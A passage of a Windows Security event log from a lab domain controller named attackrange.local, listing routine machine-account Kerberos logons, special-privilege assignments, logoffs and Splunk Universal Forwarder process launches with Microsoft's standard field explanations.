- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:54:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264175
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C826E
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:54:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264174
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7C824B
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62372
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:54:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264173
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C824B
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:54:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264187
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18bc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:54:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264186
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x408
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:54:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264188
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x760
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:54:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264189
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x554
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:54:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264190
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x290
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:54:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264192
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:54:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264191
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x15d8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:54:17 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264193
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C8455
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:54:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264196
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7CBD41
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:54:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264195
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7CBD41
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62388
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:54:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264194
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7CBD41
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:55:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264198
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1990
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:55:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264197
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x10e8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:55:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264199
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x143c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:55:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264200
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14d0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:55:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264201
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1130
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:55:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264203
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a7c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:55:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264202
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b1c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:55:38 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264204
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C824B
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:55:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264207
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7D0708
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:55:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264206
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7D0708
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62401
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
